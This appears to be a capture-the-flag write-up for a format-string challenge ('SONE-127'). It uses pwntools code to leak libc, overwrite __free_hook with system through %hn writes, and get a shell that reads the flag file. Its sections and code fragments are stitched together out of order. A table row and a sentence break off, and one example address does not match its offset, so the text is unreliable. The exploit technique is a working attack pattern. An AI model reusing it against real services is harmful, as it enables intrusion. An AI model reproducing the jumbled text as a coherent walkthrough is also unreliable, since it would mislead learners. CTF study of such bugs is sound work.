```
> echo AAAA%low%8$hn%high%9$hnBBBBaddr_lowaddr_high
```

Where `addr_low` and `addr_high` are the low/high 2‑byte parts of `__free_hook` placed in the payload after the format string (so that they appear on the stack as the 8th and 9th arguments).
```python
if __name__ == '__main__':
    main()
```
```
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a1b2c3d4e5f6..., stripped
PIE: No, RELRO: Partial, Stack: Canary found, NX: Enabled, PIE: No, RPATH: []
```

3.1 Interaction

```
> help
Commands:
echo <msg> - Echoes back the message
calc <expr> - Evaluates a simple arithmetic expression
upload <filename> - Upload a file to the server
download <filename> - Download a file from the server
exit - Quit
```

The only interesting command is `echo`. Sending a long string revealed an unintended format‑string:
| Function | Purpose |
|----------|---------|
| `leak_libc` | Uses the format‑string to leak a libc address and compute the base. |
| `write_free_hook` | Crafts a two‑write `%hn` payload that stores `system` at `__free_hook`. |
| `get_shell` | Uploads a chunk containing `/bin/sh` and then frees it, invoking `system`. |
| `main` | Orchestrates the steps and drops SONE-127 2021 |
```
> upload sh.txt
[uploading 8 bytes]
/bin/sh
```

The service stores the content in a heap chunk. When we later request `download sh.txt`, the binary will free the buffer after sending the content. Because `__free_hook` now points to `system`, `free(buf)` becomes `system(buf)`. Since `buf` points to the string `"/bin/sh"`, we get a shell.
```python
from pwn import *
```
```python
io.sendlineafter(b'> ', b'echo ' + payload)
io.recvuntil(b'> ')  # sync back to prompt
```
The final crafted string (Python example):
```python
payload = b'A'*8                           # padding for alignment
payload += f"%{low}c%8$hn".encode()
payload += f"%{high-low}c%9$hn".encode()
payload += b'B'*8
payload += p64(target)                     # argument 8
payload += p64(target+2)                   # argument 9
```

Send the payload with `echo` and the service writes the low and high halves of `system` into `__free_hook`. Now we need a chunk that contains the string `"/bin/sh"`. The simplest way is to upload a file named `sh.txt` with that exact content.
```python
HOST = 'sone-127.ctf.example.com'
PORT = 31337
```
| Symbol | Offset (hex) | Address (example) |
|-----------------|--------------|-------------------|
| `system` | 0x4f550 | 0x7f5c190f550 |
| `__free_hook` | 0x3ed8e8 | 0x7f5c193ed8e8 |
| `/bin/sh` string | 0x1b75aa | 0x7f5c191b75aa |

Use `pwntools`:

```python
libc = ELF('libc-2.31.so')
system_addr = libc.symbols['system'] + libc_base
free_hook = libc.symbols['__free_hook'] + libc_base
binsh = next(libc.search(b'/bin/sh')) + libc_base
```

5.3 Write system into __free_hook

The binary uses `malloc` / `free` internally for the `upload` / `download` commands. By uploading a large payload we can control a heap chunk and then use the format‑string write to place the `system` address at `__free_hook`.
```
> download sh.txt
/bin/sh
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ cat /flag.txt
FLAGSONE_127_2021_4c7f5b
```

Success!

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
```
```
> echo %7$p
0x7f5c1a2b2e30
```

The address `0x7f5c1a2b2e30` belongs to the (high address > 0x7f000000).